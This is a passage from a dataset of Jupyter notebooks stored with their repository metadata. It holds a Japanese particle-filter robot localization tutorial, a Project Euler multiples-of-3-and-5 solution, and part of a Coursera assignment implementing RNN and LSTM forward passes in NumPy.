= rx + self.distance * math.cos(rt + self.direction)\n proposed_ly = ry + self.distance * math.sin(rt + self.direction)\n \n e = copy(self.error_ellipse)\n e.shift(np.array([proposed_lx, proposed_ly]).T, rt + self.direction)\n \n # 固有ベクトルを二つ求めて、それぞれの大きさを求めて楕円を作り、幅を計算した方の固有ベクトルの向きに楕円を回転すると誤差楕円になります。\n eigen = np.linalg.eig(e.cov)\n \n v1 = eigen[0][0] * eigen[1][0]\n v2 = eigen[0][1] * eigen[1][1]\n v1_direction = math.atan2(v1[1],v1[0])\n \n elli = Ellipse([proposed_lx, proposed_ly],width=math.sqrt(np.linalg.norm(v1)),height=math.sqrt(np.linalg.norm(v2)),angle=v1_direction/3.14*180)\n elli.set_alpha(0.2)\n \n return elli\n \n # 描画用\n def draw(self,sp,robot_pos):\n sp.add_artist(self.ellipse(robot_pos)) \n\nactual_landmarks = Landmarks(np.array([[-0.5,0.0],[0.5,0.0],[0.0,0.5]]))\nactual_landmarks.draw()",
"_____no_output_____"
]
],
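[
[
"# Supplementary sanity check (not in the original notebook): the density of a 2-D Gaussian\n# evaluated at its mean should equal 1 / (2 * pi * sqrt(det(cov))).\ng = Gaussian2D(sigma_x=0.3, sigma_y=0.1, cov_xy=0.0, mu_x=1.0, mu_y=2.0)\npeak = g.value(np.array([1.0, 2.0]).T)\nprint(peak, 1.0 / (2 * math.pi * math.sqrt(np.linalg.det(g.cov))))  # the two values should match",
"_____no_output_____"
]
],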
[
[
"### パーティクルのクラスとパーティクルフィルタのクラス\n\nロボットの初期姿勢は分からないという前提なので、パーティクルはロボットが存在しうる範囲にランダムに配置する。",
"_____no_output_____"
]
],
[
[
"# パーティクルのクラス。単なる構造体\nclass Particle:\n def __init__(self,x,y,t,w):\n self.pos = np.array([x,y,t])\n self.w = w\n\n# パーティクルフィルタのクラス\nclass ParticleFilter:\n # この実装ではコンストラクタはパーティクルの個数だけを引数にとる\n def __init__(self,num):\n # 空のパーティクルのリストを作って一つずつ追加していく(実装がベタ)\n self.particles = []\n for i in range(num):\n x = random.uniform(-1.0,1.0)\n y = random.uniform(-0.5,1.5)\n t = random.uniform(-math.pi,math.pi)\n self.particles.append(Particle(x,y,t,1.0/num)) # 初期位置がわからないという前提なのでパーティクルをランダムに置く\n \n # ロボットが動いたときにパーティクルを動かすためのメソッド\n # 引数の「motion」はメソッドで、ロボットの移動を再現するためのもの。\n # ロボットは自身がどのように動作するとどう姿勢が変化するかを知っており、このメソッドがその知識となる。\n def moveParticles(self,fw,rot,motion):\n self.resampling() # このメソッドについては後述\n \n # パーティクルごとに移動した後の姿勢を計算し、姿勢を更新する。\n for p in self.particles:\n after = motion(p.pos,fw,rot) \n p.pos = after\n \n # リサンプリングのためのメソッド。\n # リサンプリングは、重みがごく少数のパーティクルに偏ることを防ぐための措置で、近似していない理論上の数式では出現しない。\n def resampling(self):\n num = len(self.particles) # numはパーティクルの個数\n ws = [e.w for e in self.particles] # 重みのリストを作る\n \n print(sum(ws))\n if sum(ws) < 1e-100: #重みの和がゼロに丸め込まれるとサンプリングできなくなるので小さな数を足しておく\n ws = [e + 1e-100 for e in ws]\n \n ps = random.choices(self.particles, weights=ws, k=num) # パーティクルのリストから、weightsのリストの重みに比例した確率で、num個選ぶ\n self.particles = [Particle(*e.pos,1.0/num) for e in ps] # 選んだリストからパーティクルを取り出し、パーティクルの姿勢から重み1/numの新しいパーティクルを作成\n\n # 描画用\n def draw(self,c=\"blue\",lbl=\"particles\"):\n xs = [p.pos[0] for p in self.particles]\n ys = [p.pos[1] for p in self.particles]\n vxs = [math.cos(p.pos[2]) for p in self.particles]\n vys = [math.sin(p.pos[2]) for p in self.particles]\n plt.quiver(xs,ys,vxs,vys,color=c,label=lbl,alpha=0.7)",
"_____no_output_____"
]
],
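[
[
"# Supplementary demo (not in the original notebook): ParticleFilter.resampling relies on\n# random.choices drawing items in proportion to their weights; a toy run makes that visible.\nfrom collections import Counter\ntoy_weights = [0.7, 0.2, 0.1]\ndraws = random.choices([\"a\", \"b\", \"c\"], weights=toy_weights, k=10000)\nprint(Counter(draws))  # expect roughly 7000 / 2000 / 1000",
"_____no_output_____"
]
],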
[
[
"### ロボットを表現するクラス\n\nロボットはランドマークを観測して1ステップ進んで・・・を繰り返します。",
"_____no_output_____"
]
],
[
[
"class Robot:\n def __init__(self,x,y,rad):\n random.seed()\n \n # actual_poses: ロボットの姿勢の真値を1ステップごとに記録したもの\n # (ロボットのクラス内にいるけどロボットはこの情報を使えない)\n self.actual_poses = [np.array([x,y,rad])]\n \n # パーティクルフィルタの準備(パーティクル数30個)\n self.pf = ParticleFilter(30)\n \n # ロボットの動作をシミュレートするメソッド。シミュレーションだけでなく、ロボットがパーティクルを移動するときにも用いる。\n # つまり実機に実装する場合もこのメソッドが必要となる。雑音の度合いは事前に計測するか、\n # ざっくり決めてフィルタのロバスト性に頼る。\n def motion(self, pos, fw, rot):\n # fwだけ前進してその後rotだけ回転。雑音を混入させる\n actual_fw = random.gauss(fw,fw/10) #進む距離に対して標準偏差10%の雑音を混入\n dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0) # 前進方向がヨレる雑音を標準偏差3[deg]で混入\n \n px, py, pt = pos\n # 移動後の位置を算出\n x = px + actual_fw * math.cos(pt + dir_error)\n y = py + actual_fw * math.sin(pt + dir_error)\n # 雑音込みの回転各を算出。rotに対して標準偏差10%の雑音を混ぜる\n actual_rot = random.gauss(rot,rot/10)\n t = pt + dir_error + actual_rot # さらにヨレの分の角度を足す\n \n return np.array([x,y,t])\n \n # ロボットが動くときに呼び出すメソッド。ロボットの位置の更新とパーティクルの位置の更新\n def move(self,fw,rot):\n self.actual_poses.append(self.motion(self.actual_poses[-1],fw,rot))\n self.pf.moveParticles(fw,rot,self.motion)\n \n # ロボットがランドマーク観測するときに呼び出すメソッド\n def observation(self,landmarks):\n obss = []\n for i,landmark in enumerate(landmarks.positions): # 3つあるランドマークを1つずつ観測\n obss.append(Observation(self.actual_poses[-1],landmark,i))\n obss = list(filter(lambda e : e.lid != None, obss)) # 観測データのないものを除去\n \n # 重みに尤度をかける\n for obs in obss:\n for p in self.pf.particles:\n p.w *= obs.likelihood(p.pos)\n \n # 描画用に観測のリストを返す\n return obss\n \n # 描画用\n def draw(self,sp,observations):\n for obs in observations:\n for p in self.pf.particles:\n obs.draw(sp,p.pos)\n \n self.pf.draw()\n \n xs = [e[0] for e in self.actual_poses]\n ys = [e[1] for e in self.actual_poses]\n vxs = [math.cos(e[2]) for e in self.actual_poses]\n vys = [math.sin(e[2]) for e in self.actual_poses]\n plt.quiver(xs,ys,vxs,vys,color=\"red\",label=\"actual robot motion\")",
"_____no_output_____"
]
],
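[
[
"# Supplementary demo (not in the original notebook): sampling Robot.motion repeatedly from the\n# same pose makes the odometry noise model visible (about 10% standard deviation on the distance).\nr = Robot(0.0, 0.0, 0.0)\nsamples = np.array([r.motion(np.array([0.0, 0.0, 0.0]), 0.2, 0.0) for _ in range(1000)])\nprint(\"mean pose:\", samples.mean(axis=0))\nprint(\"std of x:\", samples[:, 0].std())  # should be close to 0.2 * 0.1 = 0.02",
"_____no_output_____"
]
],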
[
[
"## 描画用の関数\n\n説明は割愛。",
"_____no_output_____"
]
],
[
[
"def draw(i,observations):\n fig = plt.figure(i,figsize=(8, 8))\n sp = fig.add_subplot(111, aspect='equal')\n sp.set_xlim(-1.0,1.0)\n sp.set_ylim(-0.5,1.5)\n\n robot.draw(sp,observations)\n \n actual_landmarks.draw()\n\n plt.legend()",
"_____no_output_____"
]
],
[
[
"## シミュレーションの実行\n\n図の説明: \n\n* 赤の矢印: 真の姿勢\n* 星: ランドマークの位置\n* 青の矢印: パーティクルの姿勢\n* 楕円: ランドマークの観測値と各パーティクルの姿勢からランドマークの位置を計算したものと、その位置の曖昧さを表す共分散行列",
"_____no_output_____"
]
],
[
[
"robot = Robot(0,0,0) # ロボットを原点に\n\n# 観測、描画、移動の繰り返し\nfor i in range(0,18):\n obss = robot.observation(actual_landmarks)\n draw(i,obss)\n robot.move(0.2,math.pi / 180.0 * 20)",
"3.4857462624018935e-94\n1.7035402799540005e-178\n0.0\n21.604406200433147\n0.9999999999999999\n44.479321225433516\n6.005893681034994\n21.411558268966374\n45.62303779568465\n2.340642845412178\n7.259398556265846\n20.99013001681471\n6.615595607270375e-27\n1.667989573024536e-39\n4.345534966955492e-79\n1.2252985626051819e-211\n2.375769226589642e-25\n1.0042934512227948e-49\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70919230e85ce39dfca101635d597652cf5002b | 4,221 | ipynb | Jupyter Notebook | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 01_Multiples_of_3_and_5.ipynb | bundickm/Daily-Project-Euler | 50d7462aa4b49735c744b941d558312d2f27bc87 | [
"MIT"
] | null | null | null | 26.38125 | 248 | 0.446577 | [
[
[
"<a href=\"https://colab.research.google.com/github/bundickm/Daily-Project-Euler/blob/main/01_Multiples_of_3_and_5.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23. Find the sum of all the multiples of 3 or 5 below 1000.",
"_____no_output_____"
]
],
[
[
"#initial solution\ndef sum_of_multiples_3_5(n):\n total = 0\n for i in range(1, n):\n if ((i%3==0) | (i%5==0)):\n total+=i\n return total\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
[
"#refactored as a list comprehension\ndef sum_of_multiples_3_5(n):\n return sum([i for i in range(1, n) \n if ((i%3==0) | (i%5==0))])\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
[
"# Method with math instead of loops\ndef sum_of_multi(target, multiple):\n # sum of all multiples up to and including target\n x = target // multiple\n return multiple*(x*(x+1))//2\n\ndef sum_of_multiples_3_5(target):\n # Adjust target since the problem is non-inclusive\n target = target-1\n # Return the sum of multiples of 3 and 5\n # Remove dupes by subtracting all multiples of\n # least common multiplier, 15\n return (sum_of_multi(target, 3) + \n sum_of_multi(target, 5) - \n sum_of_multi(target, 15))\n\nsum_of_multiples_3_5(1000)",
"_____no_output_____"
],
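[
"*Added note (not part of the original solutions):* why the constant-time method above works. The multiples of $m$ up to $N$ are $m, 2m, \\dots, xm$ with $x = \\lfloor N/m \\rfloor$, so their sum is\n\n$$\\sum_{k=1}^{x} km = m\\,\\frac{x(x+1)}{2},$$\n\nand by inclusion-exclusion the answer is $S_3 + S_5 - S_{15}$, because every multiple of $15$ is counted once in $S_3$ and once in $S_5$.",
"_____no_output_____"
],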
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e7092160ad1c4a483e70d7f299a1b7c657b5d85a | 83,460 | ipynb | Jupyter Notebook | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | 2 | 2020-08-21T03:59:01.000Z | 2020-09-05T13:13:19.000Z | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | null | null | null | 4. Sequence Models/Week 1/Building a Recurrent Neural Network - Step by Step/Building a Recurrent Neural Network - Step by Step - v3.ipynb | adityajn105/Coursera-Deep-Learning-Specialization | 26cf7da29b2f1cb32799e045cc9cdfab99ad0757 | [
"Unlicense"
] | null | null | null | 40.416465 | 1,948 | 0.467589 | [
[
[
"# Building your Recurrent Neural Network - Step by Step\n\nWelcome to Course 5's first assignment! In this assignment, you will implement your first Recurrent Neural Network in numpy.\n\nRecurrent Neural Networks (RNN) are very effective for Natural Language Processing and other sequence tasks because they have \"memory\". They can read inputs $x^{\\langle t \\rangle}$ (such as words) one at a time, and remember some information/context through the hidden layer activations that get passed from one time-step to the next. This allows a uni-directional RNN to take information from the past to process later inputs. A bidirection RNN can take context from both the past and the future. \n\n**Notation**:\n- Superscript $[l]$ denotes an object associated with the $l^{th}$ layer. \n - Example: $a^{[4]}$ is the $4^{th}$ layer activation. $W^{[5]}$ and $b^{[5]}$ are the $5^{th}$ layer parameters.\n\n- Superscript $(i)$ denotes an object associated with the $i^{th}$ example. \n - Example: $x^{(i)}$ is the $i^{th}$ training example input.\n\n- Superscript $\\langle t \\rangle$ denotes an object at the $t^{th}$ time-step. \n - Example: $x^{\\langle t \\rangle}$ is the input x at the $t^{th}$ time-step. $x^{(i)\\langle t \\rangle}$ is the input at the $t^{th}$ timestep of example $i$.\n \n- Lowerscript $i$ denotes the $i^{th}$ entry of a vector.\n - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the activations in layer $l$.\n\nWe assume that you are already familiar with `numpy` and/or have completed the previous courses of the specialization. Let's get started!",
"_____no_output_____"
],
[
"Let's first import all the packages that you will need during this assignment.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom rnn_utils import *",
"_____no_output_____"
]
],
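[
[
"# Optional fallback (not part of the original assignment): this notebook assumes that `rnn_utils`\n# provides `sigmoid` and `softmax`. If that module is unavailable, the definitions below are\n# reasonable stand-ins inferred from how the notebook uses the two helpers.\ntry:\n    sigmoid, softmax  # already provided by rnn_utils\nexcept NameError:\n    def sigmoid(x):\n        # element-wise logistic function\n        return 1 / (1 + np.exp(-x))\n\n    def softmax(x):\n        # column-wise softmax; subtracting the max improves numerical stability\n        e_x = np.exp(x - np.max(x, axis=0, keepdims=True))\n        return e_x / e_x.sum(axis=0, keepdims=True)",
"_____no_output_____"
]
],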
[
[
"## 1 - Forward propagation for the basic Recurrent Neural Network\n\nLater this week, you will generate music using an RNN. The basic RNN that you will implement has the structure below. In this example, $T_x = T_y$. ",
"_____no_output_____"
],
[
"<img src=\"images/RNN.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 1**: Basic RNN model </center></caption>",
"_____no_output_____"
],
[
"Here's how you can implement an RNN: \n\n**Steps**:\n1. Implement the calculations needed for one time-step of the RNN.\n2. Implement a loop over $T_x$ time-steps in order to process all the inputs, one at a time. \n\nLet's go!\n\n## 1.1 - RNN cell\n\nA Recurrent neural network can be seen as the repetition of a single cell. You are first going to implement the computations for a single time-step. The following figure describes the operations for a single time-step of an RNN cell. \n\n<img src=\"images/rnn_step_forward.png\" style=\"width:700px;height:300px;\">\n<caption><center> **Figure 2**: Basic RNN cell. Takes as input $x^{\\langle t \\rangle}$ (current input) and $a^{\\langle t - 1\\rangle}$ (previous hidden state containing information from the past), and outputs $a^{\\langle t \\rangle}$ which is given to the next RNN cell and also used to predict $y^{\\langle t \\rangle}$ </center></caption>\n\n**Exercise**: Implement the RNN-cell described in Figure (2).\n\n**Instructions**:\n1. Compute the hidden state with tanh activation: $a^{\\langle t \\rangle} = \\tanh(W_{aa} a^{\\langle t-1 \\rangle} + W_{ax} x^{\\langle t \\rangle} + b_a)$.\n2. Using your new hidden state $a^{\\langle t \\rangle}$, compute the prediction $\\hat{y}^{\\langle t \\rangle} = softmax(W_{ya} a^{\\langle t \\rangle} + b_y)$. We provided you a function: `softmax`.\n3. Store $(a^{\\langle t \\rangle}, a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}, parameters)$ in cache\n4. Return $a^{\\langle t \\rangle}$ , $y^{\\langle t \\rangle}$ and cache\n\nWe will vectorize over $m$ examples. Thus, $x^{\\langle t \\rangle}$ will have dimension $(n_x,m)$, and $a^{\\langle t \\rangle}$ will have dimension $(n_a,m)$. ",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: rnn_cell_forward\n\ndef rnn_cell_forward(xt, a_prev, parameters):\n \"\"\"\n Implements a single forward step of the RNN-cell as described in Figure (2)\n\n Arguments:\n xt -- your input data at timestep \"t\", numpy array of shape (n_x, m).\n a_prev -- Hidden state at timestep \"t-1\", numpy array of shape (n_a, m)\n parameters -- python dictionary containing:\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n ba -- Bias, numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n Returns:\n a_next -- next hidden state, of shape (n_a, m)\n yt_pred -- prediction at timestep \"t\", numpy array of shape (n_y, m)\n cache -- tuple of values needed for the backward pass, contains (a_next, a_prev, xt, parameters)\n \"\"\"\n \n # Retrieve parameters from \"parameters\"\n Wax = parameters[\"Wax\"]\n Waa = parameters[\"Waa\"]\n Wya = parameters[\"Wya\"]\n ba = parameters[\"ba\"]\n by = parameters[\"by\"]\n \n ### START CODE HERE ### (≈2 lines)\n # compute next activation state using the formula given above\n a_next = np.tanh( np.matmul(Wax,xt) + np.matmul(Waa,a_prev) + ba )\n # compute output of the current cell using the formula given above\n yt_pred = softmax( np.matmul(Wya,a_next) + by )\n ### END CODE HERE ###\n \n # store values you need for backward propagation in cache\n cache = (a_next, a_prev, xt, parameters)\n \n return a_next, yt_pred, cache",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nWaa = np.random.randn(5,5)\nWax = np.random.randn(5,3)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Waa\": Waa, \"Wax\": Wax, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na_next, yt_pred, cache = rnn_cell_forward(xt, a_prev, parameters)\nprint(\"a_next[4] = \", a_next[4])\nprint(\"a_next.shape = \", a_next.shape)\nprint(\"yt_pred[1] =\", yt_pred[1])\nprint(\"yt_pred.shape = \", yt_pred.shape)",
"a_next[4] = [ 0.59584544 0.18141802 0.61311866 0.99808218 0.85016201 0.99980978\n -0.18887155 0.99815551 0.6531151 0.82872037]\na_next.shape = (5, 10)\nyt_pred[1] = [ 0.9888161 0.01682021 0.21140899 0.36817467 0.98988387 0.88945212\n 0.36920224 0.9966312 0.9982559 0.17746526]\nyt_pred.shape = (2, 10)\n"
]
],
[
[
"**Expected Output**: \n\n<table>\n <tr>\n <td>\n **a_next[4]**:\n </td>\n <td>\n [ 0.59584544 0.18141802 0.61311866 0.99808218 0.85016201 0.99980978\n -0.18887155 0.99815551 0.6531151 0.82872037]\n </td>\n </tr>\n <tr>\n <td>\n **a_next.shape**:\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **yt[1]**:\n </td>\n <td>\n [ 0.9888161 0.01682021 0.21140899 0.36817467 0.98988387 0.88945212\n 0.36920224 0.9966312 0.9982559 0.17746526]\n </td>\n </tr>\n <tr>\n <td>\n **yt.shape**:\n </td>\n <td>\n (2, 10)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"## 1.2 - RNN forward pass \n\nYou can see an RNN as the repetition of the cell you've just built. If your input sequence of data is carried over 10 time steps, then you will copy the RNN cell 10 times. Each cell takes as input the hidden state from the previous cell ($a^{\\langle t-1 \\rangle}$) and the current time-step's input data ($x^{\\langle t \\rangle}$). It outputs a hidden state ($a^{\\langle t \\rangle}$) and a prediction ($y^{\\langle t \\rangle}$) for this time-step.\n\n\n<img src=\"images/rnn.png\" style=\"width:800px;height:300px;\">\n<caption><center> **Figure 3**: Basic RNN. The input sequence $x = (x^{\\langle 1 \\rangle}, x^{\\langle 2 \\rangle}, ..., x^{\\langle T_x \\rangle})$ is carried over $T_x$ time steps. The network outputs $y = (y^{\\langle 1 \\rangle}, y^{\\langle 2 \\rangle}, ..., y^{\\langle T_x \\rangle})$. </center></caption>\n\n\n\n**Exercise**: Code the forward propagation of the RNN described in Figure (3).\n\n**Instructions**:\n1. Create a vector of zeros ($a$) that will store all the hidden states computed by the RNN.\n2. Initialize the \"next\" hidden state as $a_0$ (initial hidden state).\n3. Start looping over each time step, your incremental index is $t$ :\n - Update the \"next\" hidden state and the cache by running `rnn_cell_forward`\n - Store the \"next\" hidden state in $a$ ($t^{th}$ position) \n - Store the prediction in y\n - Add the cache to the list of caches\n4. Return $a$, $y$ and caches",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: rnn_forward\n\ndef rnn_forward(x, a0, parameters):\n \"\"\"\n Implement the forward propagation of the recurrent neural network described in Figure (3).\n\n Arguments:\n x -- Input data for every time-step, of shape (n_x, m, T_x).\n a0 -- Initial hidden state, of shape (n_a, m)\n parameters -- python dictionary containing:\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n ba -- Bias numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n\n Returns:\n a -- Hidden states for every time-step, numpy array of shape (n_a, m, T_x)\n y_pred -- Predictions for every time-step, numpy array of shape (n_y, m, T_x)\n caches -- tuple of values needed for the backward pass, contains (list of caches, x)\n \"\"\"\n \n # Initialize \"caches\" which will contain the list of all caches\n caches = []\n \n # Retrieve dimensions from shapes of x and parameters[\"Wya\"]\n n_x, m, T_x = x.shape\n n_y, n_a = parameters[\"Wya\"].shape\n \n ### START CODE HERE ###\n \n # initialize \"a\" and \"y\" with zeros (≈2 lines)\n a = np.zeros( (n_a, m, T_x), dtype=np.float )\n y_pred = np.zeros( (n_y, m, T_x), dtype=np.float )\n \n # Initialize a_next (≈1 line)\n a_next = a0\n \n # loop over all time-steps\n for t in range(T_x):\n # Update next hidden state, compute the prediction, get the cache (≈1 line)\n a_next, yt_pred, cache = rnn_cell_forward(x[:,:,t], a_next, parameters)\n # Save the value of the new \"next\" hidden state in a (≈1 line)\n a[:,:,t] = a_next\n # Save the value of the prediction in y (≈1 line)\n y_pred[:,:,t] = yt_pred\n # Append \"cache\" to \"caches\" (≈1 line)\n caches.append(cache)\n \n ### END CODE HERE ###\n \n # store values needed for backward propagation in cache\n caches = (caches, x)\n \n return a, y_pred, caches",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,4)\na0 = np.random.randn(5,10)\nWaa = np.random.randn(5,5)\nWax = np.random.randn(5,3)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Waa\": Waa, \"Wax\": Wax, \"Wya\": Wya, \"ba\": ba, \"by\": by}\n\na, y_pred, caches = rnn_forward(x, a0, parameters)\nprint(\"a[4][1] = \", a[4][1])\nprint(\"a.shape = \", a.shape)\nprint(\"y_pred[1][3] =\", y_pred[1][3])\nprint(\"y_pred.shape = \", y_pred.shape)\nprint(\"caches[1][1][3] =\", caches[1][1][3])\nprint(\"len(caches) = \", len(caches))",
"a[4][1] = [-0.99999375 0.77911235 -0.99861469 -0.99833267]\na.shape = (5, 10, 4)\ny_pred[1][3] = [ 0.79560373 0.86224861 0.11118257 0.81515947]\ny_pred.shape = (2, 10, 4)\ncaches[1][1][3] = [-1.1425182 -0.34934272 -0.20889423 0.58662319]\nlen(caches) = 2\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **a[4][1]**:\n </td>\n <td>\n [-0.99999375 0.77911235 -0.99861469 -0.99833267]\n </td>\n </tr>\n <tr>\n <td>\n **a.shape**:\n </td>\n <td>\n (5, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **y[1][3]**:\n </td>\n <td>\n [ 0.79560373 0.86224861 0.11118257 0.81515947]\n </td>\n </tr>\n <tr>\n <td>\n **y.shape**:\n </td>\n <td>\n (2, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **cache[1][1][3]**:\n </td>\n <td>\n [-1.1425182 -0.34934272 -0.20889423 0.58662319]\n </td>\n </tr>\n <tr>\n <td>\n **len(cache)**:\n </td>\n <td>\n 2\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"Congratulations! You've successfully built the forward propagation of a recurrent neural network from scratch. This will work well enough for some applications, but it suffers from vanishing gradient problems. So it works best when each output $y^{\\langle t \\rangle}$ can be estimated using mainly \"local\" context (meaning information from inputs $x^{\\langle t' \\rangle}$ where $t'$ is not too far from $t$). \n\nIn the next part, you will build a more complex LSTM model, which is better at addressing vanishing gradients. The LSTM will be better able to remember a piece of information and keep it saved for many timesteps. ",
"_____no_output_____"
],
[
"## 2 - Long Short-Term Memory (LSTM) network\n\nThis following figure shows the operations of an LSTM-cell.\n\n<img src=\"images/LSTM.png\" style=\"width:500;height:400px;\">\n<caption><center> **Figure 4**: LSTM-cell. This tracks and updates a \"cell state\" or memory variable $c^{\\langle t \\rangle}$ at every time-step, which can be different from $a^{\\langle t \\rangle}$. </center></caption>\n\nSimilar to the RNN example above, you will start by implementing the LSTM cell for a single time-step. Then you can iteratively call it from inside a for-loop to have it process an input with $T_x$ time-steps. \n\n### About the gates\n\n#### - Forget gate\n\nFor the sake of this illustration, let's assume we are reading words in a piece of text, and want use an LSTM to keep track of grammatical structures, such as whether the subject is singular or plural. If the subject changes from a singular word to a plural word, we need to find a way to get rid of our previously stored memory value of the singular/plural state. In an LSTM, the forget gate let's us do this: \n\n$$\\Gamma_f^{\\langle t \\rangle} = \\sigma(W_f[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_f)\\tag{1} $$\n\nHere, $W_f$ are weights that govern the forget gate's behavior. We concatenate $[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}]$ and multiply by $W_f$. The equation above results in a vector $\\Gamma_f^{\\langle t \\rangle}$ with values between 0 and 1. This forget gate vector will be multiplied element-wise by the previous cell state $c^{\\langle t-1 \\rangle}$. So if one of the values of $\\Gamma_f^{\\langle t \\rangle}$ is 0 (or close to 0) then it means that the LSTM should remove that piece of information (e.g. the singular subject) in the corresponding component of $c^{\\langle t-1 \\rangle}$. If one of the values is 1, then it will keep the information. \n\n#### - Update gate\n\nOnce we forget that the subject being discussed is singular, we need to find a way to update it to reflect that the new subject is now plural. Here is the formula for the update gate: \n\n$$\\Gamma_u^{\\langle t \\rangle} = \\sigma(W_u[a^{\\langle t-1 \\rangle}, x^{\\{t\\}}] + b_u)\\tag{2} $$ \n\nSimilar to the forget gate, here $\\Gamma_u^{\\langle t \\rangle}$ is again a vector of values between 0 and 1. This will be multiplied element-wise with $\\tilde{c}^{\\langle t \\rangle}$, in order to compute $c^{\\langle t \\rangle}$.\n\n#### - Updating the cell \n\nTo update the new subject we need to create a new vector of numbers that we can add to our previous cell state. The equation we use is: \n\n$$ \\tilde{c}^{\\langle t \\rangle} = \\tanh(W_c[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_c)\\tag{3} $$\n\nFinally, the new cell state is: \n\n$$ c^{\\langle t \\rangle} = \\Gamma_f^{\\langle t \\rangle}* c^{\\langle t-1 \\rangle} + \\Gamma_u^{\\langle t \\rangle} *\\tilde{c}^{\\langle t \\rangle} \\tag{4} $$\n\n\n#### - Output gate\n\nTo decide which outputs we will use, we will use the following two formulas: \n\n$$ \\Gamma_o^{\\langle t \\rangle}= \\sigma(W_o[a^{\\langle t-1 \\rangle}, x^{\\langle t \\rangle}] + b_o)\\tag{5}$$ \n$$ a^{\\langle t \\rangle} = \\Gamma_o^{\\langle t \\rangle}* \\tanh(c^{\\langle t \\rangle})\\tag{6} $$\n\nWhere in equation 5 you decide what to output using a sigmoid function and in equation 6 you multiply that by the $\\tanh$ of the previous state. ",
"_____no_output_____"
],
[
"### 2.1 - LSTM cell\n\n**Exercise**: Implement the LSTM cell described in the Figure (3).\n\n**Instructions**:\n1. Concatenate $a^{\\langle t-1 \\rangle}$ and $x^{\\langle t \\rangle}$ in a single matrix: $concat = \\begin{bmatrix} a^{\\langle t-1 \\rangle} \\\\ x^{\\langle t \\rangle} \\end{bmatrix}$\n2. Compute all the formulas 1-6. You can use `sigmoid()` (provided) and `np.tanh()`.\n3. Compute the prediction $y^{\\langle t \\rangle}$. You can use `softmax()` (provided).",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: lstm_cell_forward\n\ndef lstm_cell_forward(xt, a_prev, c_prev, parameters):\n \"\"\"\n Implement a single forward step of the LSTM-cell as described in Figure (4)\n\n Arguments:\n xt -- your input data at timestep \"t\", numpy array of shape (n_x, m).\n a_prev -- Hidden state at timestep \"t-1\", numpy array of shape (n_a, m)\n c_prev -- Memory state at timestep \"t-1\", numpy array of shape (n_a, m)\n parameters -- python dictionary containing:\n Wf -- Weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n bf -- Bias of the forget gate, numpy array of shape (n_a, 1)\n Wi -- Weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n bi -- Bias of the update gate, numpy array of shape (n_a, 1)\n Wc -- Weight matrix of the first \"tanh\", numpy array of shape (n_a, n_a + n_x)\n bc -- Bias of the first \"tanh\", numpy array of shape (n_a, 1)\n Wo -- Weight matrix of the output gate, numpy 